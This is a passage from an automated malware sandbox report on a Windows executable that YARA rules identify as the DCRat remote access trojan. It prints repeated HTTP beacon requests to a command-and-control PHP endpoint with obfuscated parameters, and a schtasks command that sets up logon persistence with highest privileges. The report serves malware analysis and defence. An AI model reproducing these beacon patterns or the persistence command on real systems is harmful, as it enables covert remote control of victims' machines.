Jan 10, 2025 02:28:30.256055117 CET	625	OUT	GET /L1nc0In.php?2ClU1mdy4=ibGGARR9W&WIeFFV2nEILd0=5WNPuSwrjKZ9lMVmIpUY2tifOgt0&wEEkOKnEBPEkojTqGtqRc9gJ=9LyrBNj68wGVZXB&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&2ClU1mdy4=ibGGARR9W&WIeFFV2nEILd0=5WNPuSwrjKZ9lMVmIpUY2tifOgt0&wEEkOKnEBPEkojTqGtqRc9gJ=9LyrBNj68wGVZXB HTTP/1.1 Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: arabna4a.beget.tech Connection: Keep-Alive
Jan 10, 2025 02:28:30.991925001 CET	546	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Fri, 10 Jan 2025 01:28:30 GMT Content-Type: text/html Content-Length: 274 Last-Modified: Wed, 11 Dec 2024 08:33:48 GMT Connection: keep-alive Keep-Alive: timeout=30 ETag: "67594e6c-112" Accept-Ranges: bytes Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 73 65 74 5f 63 6f 6f 6b 69 65 28 29 7b 76 61 72 20 6e 6f 77 20 3d 20 6e 65 77 20 44 61 74 65 28 29 3b 76 61 72 20 74 69 6d 65 20 3d 20 6e 6f 77 2e 67 65 74 54 69 6d 65 28 29 3b 74 69 6d 65 20 2b 3d 20 31 39 33 36 30 30 30 30 20 2a 20 31 30 30 30 3b 6e 6f 77 2e 73 65 74 54 69 6d 65 28 74 69 6d 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 27 62 65 67 65 74 3d 62 65 67 65 74 6f 6b 27 2b 27 3b 20 65 78 70 69 72 65 73 3d 27 2b 6e 6f 77 2e 74 6f 47 4d 54 53 74 72 69 6e 67 28 29 2b 27 3b 20 70 61 74 68 3d 2f 27 3b 7d 73 65 74 5f 63 6f 6f 6b 69 65 28 29 3b 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><script>function set_cookie(){var now = new Date();var time = now.getTime();time += 19360000 * 1000;now.setTime(time);document.cookie='beget=begetok'+'; expires='+now.toGMTString()+'; path=/';}set_cookie();location.reload();;</script></head><body></body></html>
Jan 10, 2025 02:28:30.996989965 CET	601	OUT	GET /L1nc0In.php?2ClU1mdy4=ibGGARR9W&WIeFFV2nEILd0=5WNPuSwrjKZ9lMVmIpUY2tifOgt0&wEEkOKnEBPEkojTqGtqRc9gJ=9LyrBNj68wGVZXB&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&2ClU1mdy4=ibGGARR9W&WIeFFV2nEILd0=5WNPuSwrjKZ9lMVmIpUY2tifOgt0&wEEkOKnEBPEkojTqGtqRc9gJ=9LyrBNj68wGVZXB HTTP/1.1 Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: arabna4a.beget.tech
Jan 10, 2025 02:28:31.221785069 CET	546	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Fri, 10 Jan 2025 01:28:31 GMT Content-Type: text/html Content-Length: 274 Last-Modified: Wed, 11 Dec 2024 08:33:48 GMT Connection: keep-alive Keep-Alive: timeout=30 ETag: "67594e6c-112" Accept-Ranges: bytes Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 73 65 74 5f 63 6f 6f 6b 69 65 28 29 7b 76 61 72 20 6e 6f 77 20 3d 20 6e 65 77 20 44 61 74 65 28 29 3b 76 61 72 20 74 69 6d 65 20 3d 20 6e 6f 77 2e 67 65 74 54 69 6d 65 28 29 3b 74 69 6d 65 20 2b 3d 20 31 39 33 36 30 30 30 30 20 2a 20 31 30 30 30 3b 6e 6f 77 2e 73 65 74 54 69 6d 65 28 74 69 6d 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 27 62 65 67 65 74 3d 62 65 67 65 74 6f 6b 27 2b 27 3b 20 65 78 70 69 72 65 73 3d 27 2b 6e 6f 77 2e 74 6f 47 4d 54 53 74 72 69 6e 67 28 29 2b 27 3b 20 70 61 74 68 3d 2f 27 3b 7d 73 65 74 5f 63 6f 6f 6b 69 65 28 29 3b 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><script>function set_cookie(){var now = new Date();var time = now.getTime();time += 19360000 * 1000;now.setTime(time);document.cookie='beget=begetok'+'; expires='+now.toGMTString()+'; path=/';}set_cookie();location.reload();;</script></head><body></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.2.7	49982	5.101.153.201	80

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 02:29:03.677263975 CET	503	OUT	GET /L1nc0In.php?AhHKH=fcLr25XP3&5CesUO1hd=ucygGzIqU8tu5qFr&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&AhHKH=fcLr25XP3&5CesUO1hd=ucygGzIqU8tu5qFr HTTP/1.1 Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: arabna4a.beget.tech Connection: Keep-Alive
Jan 10, 2025 02:29:04.415707111 CET	546	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Fri, 10 Jan 2025 01:29:04 GMT Content-Type: text/html Content-Length: 274 Last-Modified: Wed, 11 Dec 2024 08:33:48 GMT Connection: keep-alive Keep-Alive: timeout=30 ETag: "67594e6c-112" Accept-Ranges: bytes Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 73 65 74 5f 63 6f 6f 6b 69 65 28 29 7b 76 61 72 20 6e 6f 77 20 3d 20 6e 65 77 20 44 61 74 65 28 29 3b 76 61 72 20 74 69 6d 65 20 3d 20 6e 6f 77 2e 67 65 74 54 69 6d 65 28 29 3b 74 69 6d 65 20 2b 3d 20 31 39 33 36 30 30 30 30 20 2a 20 31 30 30 30 3b 6e 6f 77 2e 73 65 74 54 69 6d 65 28 74 69 6d 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 27 62 65 67 65 74 3d 62 65 67 65 74 6f 6b 27 2b 27 3b 20 65 78 70 69 72 65 73 3d 27 2b 6e 6f 77 2e 74 6f 47 4d 54 53 74 72 69 6e 67 28 29 2b 27 3b 20 70 61 74 68 3d 2f 27 3b 7d 73 65 74 5f 63 6f 6f 6b 69 65 28 29 3b 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><script>function set_cookie(){var now = new Date();var time = now.getTime();time += 19360000 * 1000;now.setTime(time);document.cookie='beget=begetok'+'; expires='+now.toGMTString()+'; path=/';}set_cookie();location.reload();;</script></head><body></body></html>
Jan 10, 2025 02:29:04.479336023 CET	479	OUT	GET /L1nc0In.php?AhHKH=fcLr25XP3&5CesUO1hd=ucygGzIqU8tu5qFr&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&AhHKH=fcLr25XP3&5CesUO1hd=ucygGzIqU8tu5qFr HTTP/1.1 Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: arabna4a.beget.tech
Jan 10, 2025 02:29:04.704885960 CET	546	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Fri, 10 Jan 2025 01:29:04 GMT Content-Type: text/html Content-Length: 274 Last-Modified: Wed, 11 Dec 2024 08:33:48 GMT Connection: keep-alive Keep-Alive: timeout=30 ETag: "67594e6c-112" Accept-Ranges: bytes Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 73 65 74 5f 63 6f 6f 6b 69 65 28 29 7b 76 61 72 20 6e 6f 77 20 3d 20 6e 65 77 20 44 61 74 65 28 29 3b 76 61 72 20 74 69 6d 65 20 3d 20 6e 6f 77 2e 67 65 74 54 69 6d 65 28 29 3b 74 69 6d 65 20 2b 3d 20 31 39 33 36 30 30 30 30 20 2a 20 31 30 30 30 3b 6e 6f 77 2e 73 65 74 54 69 6d 65 28 74 69 6d 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 27 62 65 67 65 74 3d 62 65 67 65 74 6f 6b 27 2b 27 3b 20 65 78 70 69 72 65 73 3d 27 2b 6e 6f 77 2e 74 6f 47 4d 54 53 74 72 69 6e 67 28 29 2b 27 3b 20 70 61 74 68 3d 2f 27 3b 7d 73 65 74 5f 63 6f 6f 6b 69 65 28 29 3b 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><script>function set_cookie(){var now = new Date();var time = now.getTime();time += 19360000 * 1000;now.setTime(time);document.cookie='beget=begetok'+'; expires='+now.toGMTString()+'; path=/';}set_cookie();location.reload();;</script></head><body></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
7	192.168.2.7	49983	5.101.153.201	80

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 02:29:08.262959957 CET	597	OUT	GET /L1nc0In.php?gXDzKre6VVRBWAoGI=jPJ3UfJdDNtSj71Mwf&5qI3u1xRIQeSri2anXnDhproQ=CwUJKOJU&2aVYBgOB=j5BurgOz&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&gXDzKre6VVRBWAoGI=jPJ3UfJdDNtSj71Mwf&5qI3u1xRIQeSri2anXnDhproQ=CwUJKOJU&2aVYBgOB=j5BurgOz HTTP/1.1 Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: arabna4a.beget.tech Connection: Keep-Alive
Jan 10, 2025 02:29:08.965254068 CET	546	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Fri, 10 Jan 2025 01:29:08 GMT Content-Type: text/html Content-Length: 274 Last-Modified: Wed, 11 Dec 2024 08:33:48 GMT Connection: keep-alive Keep-Alive: timeout=30 ETag: "67594e6c-112" Accept-Ranges: bytes Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 73 65 74 5f 63 6f 6f 6b 69 65 28 29 7b 76 61 72 20 6e 6f 77 20 3d 20 6e 65 77 20 44 61 74 65 28 29 3b 76 61 72 20 74 69 6d 65 20 3d 20 6e 6f 77 2e 67 65 74 54 69 6d 65 28 29 3b 74 69 6d 65 20 2b 3d 20 31 39 33 36 30 30 30 30 20 2a 20 31 30 30 30 3b 6e 6f 77 2e 73 65 74 54 69 6d 65 28 74 69 6d 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 27 62 65 67 65 74 3d 62 65 67 65 74 6f 6b 27 2b 27 3b 20 65 78 70 69 72 65 73 3d 27 2b 6e 6f 77 2e 74 6f 47 4d 54 53 74 72 69 6e 67 28 29 2b 27 3b 20 70 61 74 68 3d 2f 27 3b 7d 73 65 74 5f 63 6f 6f 6b 69 65 28 29 3b 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><script>function set_cookie(){var now = new Date();var time = now.getTime();time += 19360000 * 1000;now.setTime(time);document.cookie='beget=begetok'+'; expires='+now.toGMTString()+'; path=/';}set_cookie();location.reload();;</script></head><body></body></html>
Jan 10, 2025 02:29:08.966891050 CET	573	OUT	GET /L1nc0In.php?gXDzKre6VVRBWAoGI=jPJ3UfJdDNtSj71Mwf&5qI3u1xRIQeSri2anXnDhproQ=CwUJKOJU&2aVYBgOB=j5BurgOz&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&gXDzKre6VVRBWAoGI=jPJ3UfJdDNtSj71Mwf&5qI3u1xRIQeSri2anXnDhproQ=CwUJKOJU&2aVYBgOB=j5BurgOz HTTP/1.1 Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: arabna4a.beget.tech
Jan 10, 2025 02:29:09.190159082 CET	546	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Fri, 10 Jan 2025 01:29:09 GMT Content-Type: text/html Content-Length: 274 Last-Modified: Wed, 11 Dec 2024 08:33:48 GMT Connection: keep-alive Keep-Alive: timeout=30 ETag: "67594e6c-112" Accept-Ranges: bytes Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 73 65 74 5f 63 6f 6f 6b 69 65 28 29 7b 76 61 72 20 6e 6f 77 20 3d 20 6e 65 77 20 44 61 74 65 28 29 3b 76 61 72 20 74 69 6d 65 20 3d 20 6e 6f 77 2e 67 65 74 54 69 6d 65 28 29 3b 74 69 6d 65 20 2b 3d 20 31 39 33 36 30 30 30 30 20 2a 20 31 30 30 30 3b 6e 6f 77 2e 73 65 74 54 69 6d 65 28 74 69 6d 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 27 62 65 67 65 74 3d 62 65 67 65 74 6f 6b 27 2b 27 3b 20 65 78 70 69 72 65 73 3d 27 2b 6e 6f 77 2e 74 6f 47 4d 54 53 74 72 69 6e 67 28 29 2b 27 3b 20 70 61 74 68 3d 2f 27 3b 7d 73 65 74 5f 63 6f 6f 6b 69 65 28 29 3b 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><script>function set_cookie(){var now = new Date();var time = now.getTime();time += 19360000 * 1000;now.setTime(time);document.cookie='beget=begetok'+'; expires='+now.toGMTString()+'; path=/';}set_cookie();location.reload();;</script></head><body></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
8	192.168.2.7	49984	5.101.153.201	80

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 02:29:38.120513916 CET	625	OUT	GET /L1nc0In.php?2ClU1mdy4=ibGGARR9W&WIeFFV2nEILd0=5WNPuSwrjKZ9lMVmIpUY2tifOgt0&wEEkOKnEBPEkojTqGtqRc9gJ=9LyrBNj68wGVZXB&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&2ClU1mdy4=ibGGARR9W&WIeFFV2nEILd0=5WNPuSwrjKZ9lMVmIpUY2tifOgt0&wEEkOKnEBPEkojTqGtqRc9gJ=9LyrBNj68wGVZXB HTTP/1.1 Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: arabna4a.beget.tech Connection: Keep-Alive
Jan 10, 2025 02:29:38.824208021 CET	546	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Fri, 10 Jan 2025 01:29:38 GMT Content-Type: text/html Content-Length: 274 Last-Modified: Wed, 11 Dec 2024 08:33:48 GMT Connection: keep-alive Keep-Alive: timeout=30 ETag: "67594e6c-112" Accept-Ranges: bytes Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 73 65 74 5f 63 6f 6f 6b 69 65 28 29 7b 76 61 72 20 6e 6f 77 20 3d 20 6e 65 77 20 44 61 74 65 28 29 3b 76 61 72 20 74 69 6d 65 20 3d 20 6e 6f 77 2e 67 65 74 54 69 6d 65 28 29 3b 74 69 6d 65 20 2b 3d 20 31 39 33 36 30 30 30 30 20 2a 20 31 30 30 30 3b 6e 6f 77 2e 73 65 74 54 69 6d 65 28 74 69 6d 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 27 62 65 67 65 74 3d 62 65 67 65 74 6f 6b 27 2b 27 3b 20 65 78 70 69 72 65 73 3d 27 2b 6e 6f 77 2e 74 6f 47 4d 54 53 74 72 69 6e 67 28 29 2b 27 3b 20 70 61 74 68 3d 2f 27 3b 7d 73 65 74 5f 63 6f 6f 6b 69 65 28 29 3b 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><script>function set_cookie(){var now = new Date();var time = now.getTime();time += 19360000 * 1000;now.setTime(time);document.cookie='beget=begetok'+'; expires='+now.toGMTString()+'; path=/';}set_cookie();location.reload();;</script></head><body></body></html>
Jan 10, 2025 02:29:38.825535059 CET	601	OUT	GET /L1nc0In.php?2ClU1mdy4=ibGGARR9W&WIeFFV2nEILd0=5WNPuSwrjKZ9lMVmIpUY2tifOgt0&wEEkOKnEBPEkojTqGtqRc9gJ=9LyrBNj68wGVZXB&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&2ClU1mdy4=ibGGARR9W&WIeFFV2nEILd0=5WNPuSwrjKZ9lMVmIpUY2tifOgt0&wEEkOKnEBPEkojTqGtqRc9gJ=9LyrBNj68wGVZXB HTTP/1.1 Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: arabna4a.beget.tech
Jan 10, 2025 02:29:39.047207117 CET	546	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Fri, 10 Jan 2025 01:29:38 GMT Content-Type: text/html Content-Length: 274 Last-Modified: Wed, 11 Dec 2024 08:33:48 GMT Connection: keep-alive Keep-Alive: timeout=30 ETag: "67594e6c-112" Accept-Ranges: bytes Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 73 65 74 5f 63 6f 6f 6b 69 65 28 29 7b 76 61 72 20 6e 6f 77 20 3d 20 6e 65 77 20 44 61 74 65 28 29 3b 76 61 72 20 74 69 6d 65 20 3d 20 6e 6f 77 2e 67 65 74 54 69 6d 65 28 29 3b 74 69 6d 65 20 2b 3d 20 31 39 33 36 30 30 30 30 20 2a 20 31 30 30 30 3b 6e 6f 77 2e 73 65 74 54 69 6d 65 28 74 69 6d 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 27 62 65 67 65 74 3d 62 65 67 65 74 6f 6b 27 2b 27 3b 20 65 78 70 69 72 65 73 3d 27 2b 6e 6f 77 2e 74 6f 47 4d 54 53 74 72 69 6e 67 28 29 2b 27 3b 20 70 61 74 68 3d 2f 27 3b 7d 73 65 74 5f 63 6f 6f 6b 69 65 28 29 3b 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><script>function set_cookie(){var now = new Date();var time = now.getTime();time += 19360000 * 1000;now.setTime(time);document.cookie='beget=begetok'+'; expires='+now.toGMTString()+'; path=/';}set_cookie();location.reload();;</script></head><body></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.7	49985	5.101.153.201	80

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 02:29:42.561369896 CET	461	OUT	GET /L1nc0In.php?n6h7L24FVf9j22S6=KanaE3aKNLBhD&FI3Wr790F1Otj5zl=Xh6n50&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&n6h7L24FVf9j22S6=KanaE3aKNLBhD&FI3Wr790F1Otj5zl=Xh6n50 HTTP/1.1 Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: arabna4a.beget.tech Connection: Keep-Alive
Jan 10, 2025 02:29:43.274739981 CET	546	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Fri, 10 Jan 2025 01:29:43 GMT Content-Type: text/html Content-Length: 274 Last-Modified: Wed, 11 Dec 2024 08:33:48 GMT Connection: keep-alive Keep-Alive: timeout=30 ETag: "67594e6c-112" Accept-Ranges: bytes Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 73 65 74 5f 63 6f 6f 6b 69 65 28 29 7b 76 61 72 20 6e 6f 77 20 3d 20 6e 65 77 20 44 61 74 65 28 29 3b 76 61 72 20 74 69 6d 65 20 3d 20 6e 6f 77 2e 67 65 74 54 69 6d 65 28 29 3b 74 69 6d 65 20 2b 3d 20 31 39 33 36 30 30 30 30 20 2a 20 31 30 30 30 3b 6e 6f 77 2e 73 65 74 54 69 6d 65 28 74 69 6d 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 27 62 65 67 65 74 3d 62 65 67 65 74 6f 6b 27 2b 27 3b 20 65 78 70 69 72 65 73 3d 27 2b 6e 6f 77 2e 74 6f 47 4d 54 53 74 72 69 6e 67 28 29 2b 27 3b 20 70 61 74 68 3d 2f 27 3b 7d 73 65 74 5f 63 6f 6f 6b 69 65 28 29 3b 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><script>function set_cookie(){var now = new Date();var time = now.getTime();time += 19360000 * 1000;now.setTime(time);document.cookie='beget=begetok'+'; expires='+now.toGMTString()+'; path=/';}set_cookie();location.reload();;</script></head><body></body></html>
Jan 10, 2025 02:29:43.276421070 CET	437	OUT	GET /L1nc0In.php?n6h7L24FVf9j22S6=KanaE3aKNLBhD&FI3Wr790F1Otj5zl=Xh6n50&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&n6h7L24FVf9j22S6=KanaE3aKNLBhD&FI3Wr790F1Otj5zl=Xh6n50 HTTP/1.1 Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: arabna4a.beget.tech
Jan 10, 2025 02:29:43.504343033 CET	546	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Fri, 10 Jan 2025 01:29:43 GMT Content-Type: text/html Content-Length: 274 Last-Modified: Wed, 11 Dec 2024 08:33:48 GMT Connection: keep-alive Keep-Alive: timeout=30 ETag: "67594e6c-112" Accept-Ranges: bytes Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 73 65 74 5f 63 6f 6f 6b 69 65 28 29 7b 76 61 72 20 6e 6f 77 20 3d 20 6e 65 77 20 44 61 74 65 28 29 3b 76 61 72 20 74 69 6d 65 20 3d 20 6e 6f 77 2e 67 65 74 54 69 6d 65 28 29 3b 74 69 6d 65 20 2b 3d 20 31 39 33 36 30 30 30 30 20 2a 20 31 30 30 30 3b 6e 6f 77 2e 73 65 74 54 69 6d 65 28 74 69 6d 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 27 62 65 67 65 74 3d 62 65 67 65 74 6f 6b 27 2b 27 3b 20 65 78 70 69 72 65 73 3d 27 2b 6e 6f 77 2e 74 6f 47 4d 54 53 74 72 69 6e 67 28 29 2b 27 3b 20 70 61 74 68 3d 2f 27 3b 7d 73 65 74 5f 63 6f 6f 6b 69 65 28 29 3b 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><script>function set_cookie(){var now = new Date();var time = now.getTime();time += 19360000 * 1000;now.setTime(time);document.cookie='beget=begetok'+'; expires='+now.toGMTString()+'; path=/';}set_cookie();location.reload();;</script></head><body></body></html>

Target ID:	0
Start time:	20:27:06
Start date:	09/01/2025
Path:	C:\Users\user\Desktop\cvXu2RR10n.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\cvXu2RR10n.exe"
Imagebase:	0xb60000
File size:	2'691'584 bytes
MD5 hash:	97A026B442F5D5739EA3D8565F3A044D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1329052019.0000000003763000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1329052019.0000000003574000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1329052019.0000000003331000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1364796894.000000001333D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	20:27:08
Start date:	09/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "vAJjQbsDlJtvByBkfqttADkNAptf" /sc ONLOGON /tr "'C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe'" /rl HIGHEST /f
Imagebase:	0x7ff79f560000
File size:	235'008 bytes
